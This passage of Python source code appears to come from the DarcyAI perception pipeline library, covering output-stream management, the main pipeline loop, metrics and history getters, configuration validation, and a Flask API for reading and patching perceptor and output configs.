default_config (dict): The default configuration for the OutputStream.\n Defaults to `None`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.add_output_stream(name=\"output_stream\",\n ... callback=None,\n ... output_stream=MyOutputStream(),\n ... 
default_config={\"key\": \"value\"})\n ```\n \"\"\"\n self.__logger.debug(\"Adding OutputStream '%s' to Pipeline\", name)\n\n validate_not_none(name, \"name is required\")\n validate_type(name, str, \"name must be a string\")\n validate(name.isidentifier(), \"name must be a valid identifier\")\n validate(\n name not in self.__output_streams,\n f\"output stream with name '{name}' already exists\")\n validate(name not in self.__perceptors, \"name must be unique\")\n\n validate_not_none(callback, \"callback is required\")\n validate(callable(callback), \"callback must be a function\")\n\n validate_not_none(output_stream, \"output_stream is required\")\n validate_type(\n output_stream,\n OutputStream,\n \"output_stream must be an instance of OutputStream\")\n\n self.__output_streams[name] = {\n \"callback\": callback,\n \"stream\": output_stream,\n }\n\n self.__create_config_registry_for_output_stream(\n name, output_stream, default_config)\n\n def remove_output_stream(self, name: str) -> None:\n \"\"\"\n Removes an OutputStream from the pipeline.\n\n # Arguments\n name (str): The name of the OutputStream to be removed.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\\\n >>> pipeline.add_output_stream(name=\"output_stream\",\n ... callback=None,\n ... output_stream=MyOutputStream(),\n ... default_config={\"key\": \"value\"})\n >>> pipeline.remove_output_stream(name=\"output_stream\")\n ```\n \"\"\"\n self.__logger.debug(\"Removing OutputStream '%s' from Pipeline\", name)\n\n validate_not_none(name, \"name is required\")\n validate_type(name, str, \"name must be a string\")\n\n if name not in self.__output_streams:\n raise ValueError(\n f\"output stream with name '{name}' does not exist\")\n\n del self.__output_streams[name]\n\n def stop(self) -> None:\n \"\"\"\n Stops the pipeline.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.stop()\n ```\n \"\"\"\n self.__logger.debug(\"Stopping Pipeline\")\n\n self.__running = False\n self.__input_stream.stop()\n for output_stream in self.__output_streams.values():\n output_stream[\"stream\"].close()\n\n def run(self) -> None:\n \"\"\"\n Runs the pipeline.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.run()\n ```\n \"\"\"\n self.__logger.debug(\"Running Pipeline\")\n\n self.__running = True\n\n pipeline_start_time = time.time()\n pps = 0\n\n stream = self.__input_stream.stream()\n validate_type(stream, Iterable, \"input stream is not Iterable\")\n\n perceptors_order = self.__get_perceptors_order()\n\n try:\n while True:\n start = time.perf_counter()\n try:\n input_data = next(stream, sentinel.END_OF_ITERATION)\n\n if input_data is sentinel.END_OF_ITERATION:\n return\n except Exception as e:\n self.__logger.exception(\"Error running Pipeline\")\n if self.__input_stream_error_handler_callback is not None:\n self.__input_stream_error_handler_callback(e)\n else:\n raise e\n\n self.__pulse_number += 1\n\n # Store input data history\n 
self.__input_data_history[self.__pulse_number] = input_data\n if len(self.__input_data_history) > self.__input_data_history_len:\n self.__input_data_history.popitem(last=False)\n\n pom = PerceptionObjectModel()\n\n # Run perceptors\n for perceptors in perceptors_order:\n async_calls = [\n self.__thread_pool.apply_async(\n self.__run_perceptor,\n args=(\n perceptor_name,\n input_data,\n pom),\n callback=self.__set_perceptor_result(perceptor_name, pom)) \\\n for perceptor_name in perceptors]\n _ = [async_call.get() for async_call in async_calls]\n\n pulse_execution_time = time.perf_counter() - start\n pps = int(self.__pulse_number / (time.time() - pipeline_start_time))\n\n # Calculate metrics\n if self.__pulse_number == 1:\n self.__average_pipeline_cycle_execution = pulse_execution_time\n else:\n self.__average_pipeline_cycle_execution = (\n self.__average_pipeline_cycle_execution *\n (self.__pulse_number - 1) +\n pulse_execution_time) / self.__pulse_number\n\n self.__metrics_history[self.__pulse_number] = {\n \"pulse_execution_time\": pulse_execution_time,\n \"perceptors\": self.__perceptors_execution_time,\n }\n if len(self.__metrics_history) > self.__metrics_history_len:\n self.__metrics_history.popitem(last=False)\n\n # Store pom\n pom.set_input_data(input_data)\n pom.set_pulse_number(self.__pulse_number)\n pom.set_pps(pps)\n self.__pom = pom\n\n # Store pom history\n self.__pom_history[self.__pulse_number] = self.__pom\n if len(self.__pom_history) > self.__pom_history_len:\n self.__pom_history.popitem(last=False)\n\n if self.__perception_completion_callback is not None:\n self.__perception_completion_callback(pom)\n\n # Run output streams\n if len(self.__output_streams) > 0:\n async_calls = [\n self.__thread_pool.apply_async(\n self.__run_output_stream,\n args=[\n output_stream_name,\n input_data,\n pom]) for output_stream_name in self.__output_streams]\n _ = [async_call.get() for async_call in async_calls]\n\n self.__pom = pom\n\n if self.__pulse_completion_callback is not None:\n self.__pulse_completion_callback(pom)\n finally:\n self.__running = False\n\n def get_pom(self) -> PerceptionObjectModel:\n \"\"\"\n Gets the Perception Object Model.\n\n # Returns\n PerceptionObjectModel: The Perception Object Model.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pom = pipeline.get_pom()\n ```\n \"\"\"\n return self.__pom\n\n def get_current_pulse_number(self) -> int:\n \"\"\"\n Gets the current pulse number.\n\n # Returns\n int: The current pulse number.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pulse_number = pipeline.get_current_pulse_number()\n ```\n \"\"\"\n return self.__pulse_number\n\n def get_latest_input(self) -> StreamData:\n \"\"\"\n Gets the latest input data.\n\n # Returns\n StreamData: The latest input data.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> latest_input = pipeline.get_latest_input()\n ```\n \"\"\"\n return self.__input_data_history[self.__pulse_number]\n\n def 
get_historical_input(self, pulse_number: int) -> StreamData:\n \"\"\"\n Gets the input data from the history.\n\n # Arguments\n pulse_number (int): The pulse number.\n\n # Returns\n StreamData: The input data from the history.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> historical_input = pipeline.get_historical_input(pulse_number=1)\n ```\n \"\"\"\n if pulse_number in self.__input_data_history:\n return self.__input_data_history[pulse_number]\n else:\n return None\n\n def get_input_history(self) -> Dict[int, StreamData]:\n \"\"\"\n Gets the input data history.\n\n # Returns\n `Dict[int, StreamData]` - The input data history.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> input_history = pipeline.get_input_history()\n ```\n \"\"\"\n return self.__input_data_history.copy()\n\n def get_historical_pom(self, pulse_number: int) -> PerceptionObjectModel:\n \"\"\"\n Gets the POM from the history.\n\n # Arguments\n pulse_number (int): The pulse number.\n\n # Returns\n PerceptionObjectModel: The POM from the history.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> historical_pom = pipeline.get_historical_pom(pulse_number=1)\n ```\n \"\"\"\n if pulse_number in self.__pom_history:\n return self.__pom_history[pulse_number]\n else:\n return None\n\n def get_pom_history(self) -> Dict[int, PerceptionObjectModel]:\n \"\"\"\n Gets the POM history.\n\n # Returns\n `Dict[int, PerceptionObjectModel]` - The POM history.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pom_history = pipeline.get_pom_history()\n ```\n \"\"\"\n return self.__pom_history.copy()\n\n def run_perceptor(\n self,\n perceptor: Perceptor,\n input_data: Any,\n multi: bool = False) -> Any:\n \"\"\"\n Runs the Perceptor.\n\n # Arguments\n perceptor (Perceptor): The Perceptor to be run.\n input_data (Any): The input data.\n multi (bool): Whether or not to run the perceptor for each item in input data.\n Defaults to `False`.\n\n # Returns\n Any: The result of running the Perceptor.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> result = pipeline.run_perceptor(perceptor=Perceptor(), input_data=None, multi=True)\n ```\n \"\"\"\n self.__logger.debug(\"Running custom Perceptor\")\n\n validate_not_none(perceptor, \"perceptor is required\")\n validate_type(\n perceptor,\n Perceptor,\n \"perceptor must be an instance of Perceptor\")\n\n if not perceptor.is_loaded():\n perceptor.load()\n\n if multi:\n return [perceptor.run(input_data_item, None)\n for input_data_item in input_data]\n else:\n return perceptor.run(input_data, None)\n\n def get_graph(self) -> Any:\n \"\"\"\n Gets the graph of 
the perceptors.\n\n # Returns\n Any: The graph of the perceptors.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> graph = pipeline.get_graph()\n ```\n \"\"\"\n result = {}\n for perceptor in self.__perceptors:\n result[perceptor] = self.__perceptors[perceptor].get_child_perceptors()\n\n return result\n\n def get_all_performance_metrics(self) -> Dict[str, Any]:\n \"\"\"\n Gets the performance metrics of the pipeline.\n\n # Returns\n `Dict[str, Any]` - The performance metrics of the pipeline.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> metrics = pipeline.get_all_performance_metrics()\n ```\n \"\"\"\n result = {\n \"execution_cycles\": self.__pulse_number,\n \"average_pipeline_cycle_execution\": self.__average_pipeline_cycle_execution,\n }\n\n perceptors = {}\n for perceptor_name in self.__perceptors:\n perceptors[perceptor_name] = self.__average_perceptor_execution[perceptor_name]\n result[\"average_perceptor_execution\"] = perceptors\n\n result[\"history\"] = self.__metrics_history\n return result\n\n def get_pulse_performance_metrics(\n self, pulse_number: Union[int, None] = None) -> Dict[str, Any]:\n \"\"\"\n Gets the performance metrics of the pipeline for specific pulse.\n\n # Arguments\n pulse_number (int): The pulse number of the pulse. Defaults to current pulse.\n Defaults to `None`.\n\n # Returns\n `Dict[str, Any]` - The performance metrics of the pipeline for specific pulse.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> metrics = pipeline.get_pulse_performance_metrics(pulse_number=1)\n ```\n \"\"\"\n if pulse_number is None:\n pulse_number = self.__pulse_number\n\n if pulse_number in self.__metrics_history:\n return self.__metrics_history[pulse_number]\n else:\n return None\n\n def get_perceptor_performance_metrics(\n self, name: str, pulse_number: Union[int, None] = None) -> Dict[str, Any]:\n \"\"\"\n Gets the performance metrics of the pipeline for specific perceptor.\n\n # Arguments\n name (str): The name of the perceptor.\n pulse_number (int): The pulse number of the pulse. Defaults to current pulse.\n Defaults to `None`.\n\n # Returns\n `Dict[str, Any]` - The performance metrics of the pipeline for specific perceptor.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> metrics = pipeline.get_perceptor_performance_metrics(name=\"perceptor_name\",\n ... 
pulse_number=1)\n ```\n \"\"\"\n if name not in self.__perceptors:\n return None\n\n if pulse_number is None:\n pulse_number = self.__pulse_number\n\n if pulse_number in self.__metrics_history:\n return self.__metrics_history[pulse_number][\"perceptors\"][name]\n else:\n return None\n\n def set_perceptor_config(\n self,\n perceptor_name: str,\n name: str,\n value: Any) -> None:\n \"\"\"\n Sets the config of the pipeline.\n\n # Arguments\n perceptor_name (str): The name of the perceptor.\n name (str): The name of the config.\n value (Any): The value of the config.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.set_perceptor_config(perceptor_name=\"perceptor_name\",\n ... name=\"config_name\",\n ... value=1)\n ```\n \"\"\"\n if perceptor_name in self.__perceptor_config_registry:\n self.__validate_and_set_value_for_perceptor_config(\n perceptor_name, name, value)\n self.__perceptors[perceptor_name].set_perceptor_config(name, value)\n else:\n raise Exception(\n f\"Perceptor with name '{perceptor_name}' not found\")\n\n def get_perceptor_config(\n self, perceptor_name: str) -> Dict[str, Tuple[Any, Config]]:\n \"\"\"\n Gets the config of the perceptor.\n\n # Arguments\n perceptor_name (str): The name of the perceptor.\n\n # Returns\n `Dict[str, Tuple[Any, Config]]` - The config of the perceptor.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> config = pipeline.get_perceptor_config(perceptor_name=\"perceptor_name\")\n ```\n \"\"\"\n if perceptor_name not in self.__perceptor_config_registry:\n raise Exception(\n f\"Perceptor with name '{perceptor_name}' not found\")\n\n response = {}\n for config_name in self.__perceptor_config_schema[perceptor_name]:\n config_schema = self.__perceptor_config_schema[perceptor_name][config_name]\n response[config_name] = (\n self.__perceptor_config_registry[perceptor_name].get(config_name),\n config_schema)\n\n return response\n\n def set_output_stream_config(\n self,\n name: str,\n config_name: str,\n value: Any) -> None:\n \"\"\"\n Sets the config of the output stream.\n\n # Arguments\n name (str): The name of the output stream.\n config_name (str): The name of the config.\n value (Any): The value of the config.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.set_output_stream_config(name=\"output_stream_name\",\n ... config_name=\"config_name\",\n ... 
value=1)\n        ```\n        \"\"\"\n        if name in self.__output_config_registry:\n            self.__validate_and_set_value_for_output_stream_config(\n                name, config_name, value)\n        else:\n            raise Exception(f\"OutputStream with name '{name}' not found\")\n\n    def get_output_stream_config(\n            self, name: str) -> Dict[str, Tuple[Any, Config]]:\n        \"\"\"\n        Gets the config of the output stream.\n\n        # Arguments\n        name (str): The name of the output stream.\n\n        # Returns\n        `Dict[str, Tuple[Any, Config]]` - The config of the output stream.\n\n        # Examples\n        ```python\n        >>> from darcyai.input.camera_stream import CameraStream\n        >>> from darcyai.pipeline import Pipeline\n\n        >>> camera = CameraStream(video_device=\"/dev/video0\")\n        >>> pipeline = Pipeline(input_stream=camera)\n        >>> config = pipeline.get_output_stream_config(name=\"output_stream_name\")\n        ```\n        \"\"\"\n        if name not in self.__output_config_registry:\n            raise Exception(f\"OutputStream with name '{name}' not found\")\n\n        response = {}\n        for config_name in self.__output_config_schema[name]:\n            config_schema = self.__output_config_schema[name][config_name]\n            response[config_name] = (\n                self.__output_config_registry[name].get(config_name),\n                config_schema)\n\n        return response\n\n    def __run_output_stream(\n            self, name: str, input_data: StreamData, pom: PerceptionObjectModel) -> None:\n        \"\"\"\n        Runs the output stream.\n\n        # Arguments\n        name (str): The name of the output stream.\n        input_data (StreamData): The input data.\n        pom (PerceptionObjectModel): The pom.\n        \"\"\"\n        try:\n            processed_data = self.__output_streams[name][\"callback\"](\n                pom, input_data)\n            output = self.__output_streams[name][\"stream\"].write(processed_data)\n            pom.set_value(name, output)\n        except Exception as e:\n            self.__logger.exception(\"Error running output stream '%s'\", name)\n            if self.__output_stream_error_handler_callback is not None:\n                self.__output_stream_error_handler_callback(name, e)\n            else:\n                raise e\n\n    def __run_perceptor(\n            self, name: str, input_data: StreamData, pom: PerceptionObjectModel) -> None:\n        \"\"\"\n        Runs the perceptor.\n\n        # Arguments\n        name (str): The name of the perceptor.\n        input_data (StreamData): The input data.\n        pom (PerceptionObjectModel): The pom.\n        \"\"\"\n        start = time.perf_counter()\n        try:\n            return self.__processing_engine.run(\n                self.__perceptors[name],\n                input_data,\n                pom,\n                self.__perceptor_config_registry[name])\n        except Exception as e:\n            self.__logger.exception(\"Error running perceptor '%s'\", name)\n            if self.__perceptor_error_handler_callback is not None:\n                self.__perceptor_error_handler_callback(name, e)\n            else:\n                raise e\n        finally:\n            execution_time = time.perf_counter() - start\n            self.__perceptors_execution_time[name] = {\n                \"execution_time\": execution_time,\n            }\n            if name in self.__average_perceptor_execution:\n                avg_perceptors_execution = self.__average_perceptor_execution[name]\n                self.__average_perceptor_execution[name] = (\n                    avg_perceptors_execution *\n                    (self.__pulse_number - 1) +\n                    execution_time) / self.__pulse_number\n            else:\n                self.__average_perceptor_execution[name] = execution_time\n\n    def __set_perceptor_result(\n            self, perceptor_name: str, pom: PerceptionObjectModel) -> Callable[[Any], None]:\n        \"\"\"\n        Sets the result of the perceptor.\n\n        # Arguments\n        perceptor_name (str): The name of the perceptor.\n        pom (PerceptionObjectModel): The pom.\n\n        # Returns\n        Callable[[Any], None]: The callback function.\n        \"\"\"\n        def set_result(result: Any) -> None:\n            \"\"\"\n            Sets the result of the perceptor.\n\n            # Arguments\n                result (Any): The result of the perceptor.\n            \"\"\"\n            pom.set_value(perceptor_name, result)\n\n        return set_result\n
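# --- Illustrative sketch, not part of the original source. __set_perceptor_result
# returns a closure so that each apply_async callback remembers *which* perceptor
# it belongs to: the pool invokes the callback with only the result value. A
# minimal standalone demonstration of the same pattern (hypothetical names):
from multiprocessing.pool import ThreadPool

results = {}

def make_callback(name):
    def on_done(value):
        results[name] = value   # `name` is captured separately per callback
    return on_done

with ThreadPool(2) as pool:
    for n in ("a", "b"):
        pool.apply_async(lambda x: x * 2, args=(len(n),),
                         callback=make_callback(n)).get()

assert results == {"a": 2, "b": 2}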
    def __get_perceptors_order(self) -> List[str]:\n        \"\"\"\n        Gets the topological order of the perceptors.\n\n        # Returns\n        [str]: The order of the perceptors.\n        \"\"\"\n        orphan_perceptors = []\n        parent_perceptors = []\n        visited = []\n\n        for perceptor_name in self.__perceptors:\n            child_perceptors = self.__perceptors[perceptor_name].get_child_perceptors()\n            if len(child_perceptors) == 0:\n                if perceptor_name not in visited:\n                    orphan_perceptors.append(perceptor_name)\n            else:\n                visited.append(perceptor_name)\n                for child in child_perceptors:\n                    parent_perceptors.append((perceptor_name, child))\n                    visited.append(child)\n\n        if len(parent_perceptors) > 0:\n            perceptors_order = acyclic_toposort(parent_perceptors)\n            for orphan in orphan_perceptors:\n                perceptors_order[0].add(orphan)\n        else:\n            perceptors_order = [orphan_perceptors]\n\n        return perceptors_order\n
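# --- Illustrative sketch, not part of the original source. acyclic_toposort (an
# external helper) appears to return *levels* of nodes with no unresolved
# dependencies, so each level can be dispatched to the thread pool together. A
# hand-rolled equivalent using Kahn's algorithm over (parent, child) edges:
def staged_order(edges):
    from collections import defaultdict
    indeg, children, nodes = defaultdict(int), defaultdict(set), set()
    for parent, child in edges:
        nodes.update((parent, child))
        if child not in children[parent]:   # ignore duplicate edges
            children[parent].add(child)
            indeg[child] += 1
    stage, levels = {n for n in nodes if indeg[n] == 0}, []
    while stage:
        levels.append(stage)
        nxt = set()
        for n in stage:
            for c in children[n]:
                indeg[c] -= 1
                if indeg[c] == 0:
                    nxt.add(c)
        stage = nxt
    return levels

assert staged_order([("a", "b"), ("a", "c"), ("b", "d"), ("c", "d")]) == [{"a"}, {"b", "c"}, {"d"}]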
    def __validate_perceptor(self,\n                             name: str,\n                             perceptor: Perceptor,\n                             input_callback:\n                             Callable[[StreamData, PerceptionObjectModel], Any] = None,\n                             output_callback: Callable[[Any, PerceptionObjectModel], Any] = None,\n                             accelerator_idx: Union[int, None] = None,\n                             default_config: dict = None) -> None:\n        \"\"\"\n        Validates the perceptor.\n\n        # Arguments\n        name (str): The name of the perceptor.\n        perceptor (Perceptor): The perceptor.\n        input_callback (Callable[[StreamData, PerceptionObjectModel], Any]): The\n            callback function for the input stream. Defaults to `None`.\n        output_callback (Callable[[Any, PerceptionObjectModel], Any]): The\n            callback function for the output stream. Defaults to `None`.\n        accelerator_idx (int): The index of the accelerator. Defaults to `None`.\n        default_config (dict): The default config. Defaults to `None`.\n        \"\"\"\n        if self.__running:\n            raise Exception(\"Pipeline is already running\")\n\n        validate_not_none(name, \"name is required\")\n        validate_type(name, str, \"name must be a string\")\n        validate(name.isidentifier(), \"name must be a valid identifier\")\n        validate(name not in self.__perceptors, \"name must be unique\")\n        validate(name not in self.__output_streams, \"name must be unique\")\n\n        validate_not_none(perceptor, \"perceptor is required\")\n        validate_type(\n            perceptor,\n            Perceptor,\n            \"perceptor must be an instance of Perceptor\")\n\n        if input_callback is not None:\n            validate(callable(input_callback), \"input_callback must be a function\")\n\n        if output_callback is not None:\n            validate(\n                callable(output_callback),\n                \"output_callback must be a function\")\n\n        validate_not_none(accelerator_idx, \"accelerator_idx is required\")\n        validate_type(\n            accelerator_idx,\n            int,\n            \"accelerator_idx must be an integer\")\n\n        if accelerator_idx < 0 or accelerator_idx >= self.__num_of_edge_tpus:\n            raise ValueError(\n                f\"accelerator_idx must be >= 0 and < {self.__num_of_edge_tpus}\")\n\n        if default_config is not None:\n            validate_type(\n                default_config,\n                dict,\n                \"default_config must be a dictionary\")\n\n    def __get_perceptor_parents(self, perceptor_name: str) -> List[str]:\n        \"\"\"\n        Gets the parents of the perceptor.\n\n        # Arguments\n        perceptor_name (str): The name of the perceptor.\n\n        # Returns\n        [str]: The parents of the perceptor.\n        \"\"\"\n        parent_perceptors = []\n        for parent_perceptor_name in self.__perceptors:\n            child_perceptors = self.__perceptors[parent_perceptor_name].get_child_perceptors()\n            if perceptor_name in child_perceptors:\n                parent_perceptors.append(parent_perceptor_name)\n\n        return parent_perceptors\n
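# --- Illustrative sketch, not part of the original source. __get_perceptor_parents
# scans every node's child list on each call; when many lookups are needed, the
# usual alternative is to invert the adjacency once. Hypothetical helper:
def reverse_edges(children):
    parents = {name: [] for name in children}
    for parent, kids in children.items():
        for kid in kids:
            parents.setdefault(kid, []).append(parent)
    return parents

assert reverse_edges({"a": ["b"], "b": ["c"], "c": []}) == {"a": [], "b": ["a"], "c": ["b"]}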
    def __create_config_registry_for_perceptor(\n            self,\n            perceptor_name: str,\n            perceptor: Perceptor,\n            default_config: dict = None) -> None:\n        \"\"\"\n        Creates the config registry for the perceptor.\n\n        # Arguments\n        perceptor_name (str): The name of the perceptor.\n        perceptor (Perceptor): The perceptor.\n        default_config (dict): The default config. Defaults to `None`.\n        \"\"\"\n        self.__perceptor_config_registry[perceptor_name] = ConfigRegistry()\n\n        perceptor_config_schema = perceptor.get_config_schema()\n        config_schema_dict = {}\n        for config_schema in perceptor_config_schema:\n            validate_type(\n                config_schema,\n                Config,\n                \"config_schema must be an instance of Config\")\n            config_schema_dict[config_schema.name] = config_schema\n            self.__perceptor_config_registry[perceptor_name].set_value(\n                config_schema.name, config_schema.default_value)\n        self.__perceptor_config_schema[perceptor_name] = config_schema_dict\n\n        if default_config is not None:\n            for name, value in default_config.items():\n                self.__validate_and_set_value_for_perceptor_config(\n                    perceptor_name, name, value)\n\n    def __validate_and_set_value_for_perceptor_config(\n            self, perceptor_name: str, config_name: str, value: Any) -> None:\n        \"\"\"\n        Validates and sets the value for the perceptor config.\n\n        # Arguments\n        perceptor_name (str): The name of the perceptor.\n        config_name (str): The name of the config.\n        value (Any): The value of the config.\n        \"\"\"\n        config_schema_dict = self.__perceptor_config_schema[perceptor_name]\n        if config_name not in config_schema_dict:\n            return\n\n        config_schema = config_schema_dict[config_name]\n\n        converted_value = value\n        if config_schema.type == \"rgb\" and isinstance(value, str):\n            if value[0] == \"#\":\n                converted_value = RGB.from_hex_string(value)\n            else:\n                converted_value = RGB.from_string(value)\n\n        if not config_schema.is_valid(converted_value):\n            raise ValueError(f\"Invalid value for config '{config_name}'\")\n\n        self.__perceptor_config_registry[perceptor_name].set_value(\n            config_name, converted_value)\n        self.__perceptors[perceptor_name].set_perceptor_config(\n            config_name, converted_value)\n\n    def __start_api_server(self) -> None:\n        \"\"\"\n        Starts the API server.\n        \"\"\"\n        script_dir = pathlib.Path(__file__).parent.absolute()\n        swagger_path = os.path.join(script_dir, \"swagger\")\n        if self.__flask_app is None:\n            self.__flask_app = Flask(__name__,\n                                     static_folder=os.path.join(swagger_path, \"static\"),\n                                     template_folder=os.path.join(swagger_path, \"templates\"))\n            self.__setup_paths()\n            self.__flask_app.json_encoder = CustomJSONEncoder\n            serve(self.__flask_app, listen=f\"{self.__host}:{self.__port}\")\n        else:\n            self.__setup_paths()\n            self.__flask_app.json_encoder = CustomJSONEncoder\n\n    def __setup_paths(self) -> None:\n        \"\"\"\n        Sets up the paths.\n        \"\"\"\n        paths = {\n            \"/perceptors\": {\n                \"methods\": [\"GET\"],\n                \"function\": self.__get_perceptors,\n            },\n            \"/outputs\": {\n                \"methods\": [\"GET\"],\n                \"function\": self.__get_outputs,\n            },\n            \"/perceptors/config\": {\n                \"methods\": [\"GET\", \"PATCH\"],\n                \"function\": self.__modify_perceptors_config_registry,\n            },\n            \"/perceptors/<perceptor>/config\": {\n                \"methods\": [\"GET\", \"PATCH\"],\n                \"function\": self.__modify_perceptor_config_registry,\n            },\n            \"/outputs/config\": {\n                \"methods\": [\"GET\", \"PATCH\"],\n                \"function\": self.__modify_outputs_config_registry,\n            },\n            \"/outputs/<output_stream>/config\": {\n                \"methods\": [\"GET\", \"PATCH\"],\n                \"function\": self.__modify_output_config_registry,\n            },\n            \"/swagger\": {\n                \"methods\": [\"GET\"],\n                \"function\": self.__swagger,\n            },\n            \"/specs\": {\n                \"methods\": [\"GET\"],\n                \"function\": self.__specs,\n            },\n        }\n\n        for path, path_config in paths.items():\n            complete_path = self.__path + path\n\n            add = True\n            for rule in self.__flask_app.url_map.iter_rules():\n                if rule.rule == complete_path:\n                    add = False\n                    break\n\n            if not add:\n                continue\n\n            
self.__flask_app.add_url_rule(\n complete_path,\n complete_path,\n path_config[\"function\"],\n methods=path_config[\"methods\"])\n\n def __get_perceptors(self) -> Response:\n \"\"\"\n Gets the perceptors.\n\n # Returns\n Response: The response.\n \"\"\"\n perceptors = self.__perceptors.keys()\n return jsonify(list(perceptors))\n\n def __get_outputs(self) -> Response:\n \"\"\"\n Gets the outputs.\n\n # Returns\n Response: The response.\n \"\"\"\n output_streams = self.__output_streams.keys()\n return jsonify(list(output_streams))\n\n def __modify_perceptors_config_registry(self) -> Response:\n \"\"\"\n Modifies the perceptors config registry.\n\n # Returns\n Response: The response.\n \"\"\"\n errors = []\n if request.method == \"PATCH\":\n body = self.__get_body()\n for perceptor_name, values in body.items():\n if perceptor_name not in self.__perceptors:\n return Response(\n f\"perceptor with name {perceptor_name} does not exist\",\n status=404)\n\n for name, value in values.items():\n try:\n self.__validate_and_set_value_for_perceptor_config(\n perceptor_name, name, value)\n except BaseException:\n errors.append(f\"Invalid value for config '{name}'\")\n pass\n\n if len(errors) > 0:\n return jsonify(errors), 400\n\n cfgs = {}\n for perceptor_name in self.__perceptors:\n cfgs[perceptor_name] = []\n for config_name in self.__perceptor_config_schema[perceptor_name]:\n config_schema = self.__perceptor_config_schema[perceptor_name][config_name]\n cfgs[perceptor_name].append({\n \"name\": config_name,\n \"label\": config_schema.label,\n \"value\": self.__perceptor_config_registry[perceptor_name].get(config_name),\n \"type\": config_schema.type,\n \"description\": config_schema.description,\n \"default_value\": config_schema.default_value,\n })\n\n return jsonify(cfgs)\n\n def __modify_perceptor_config_registry(self, **kwargs) -> Response:\n \"\"\"\n Modifies the perceptor config registry.\n\n # Arguments\n **kwargs: The keyword arguments.\n\n # Returns\n Response: The response.\n \"\"\"\n perceptor_name = kwargs[\"perceptor\"]\n\n if perceptor_name not in self.__perceptors:\n return Response(\n f\"perceptor with name {perceptor_name} does not exist\", status=404)\n\n errors = []\n if request.method == \"PATCH\":\n body = self.__get_body()\n for name, value in body.items():\n try:\n self.__validate_and_set_value_for_perceptor_config(\n perceptor_name, name, value)\n except BaseException:\n errors.append(f\"Invalid value for config '{name}'\")\n pass\n\n if len(errors) > 0:\n return jsonify(errors), 400\n\n cfgs = []\n for config_name in self.__perceptor_config_schema[perceptor_name]:\n config_schema = self.__perceptor_config_schema[perceptor_name][config_name]\n cfgs.append({\n \"name\": config_name,\n \"label\": config_schema.label,\n \"value\": self.__perceptor_config_registry[perceptor_name].get(config_name),\n \"type\": 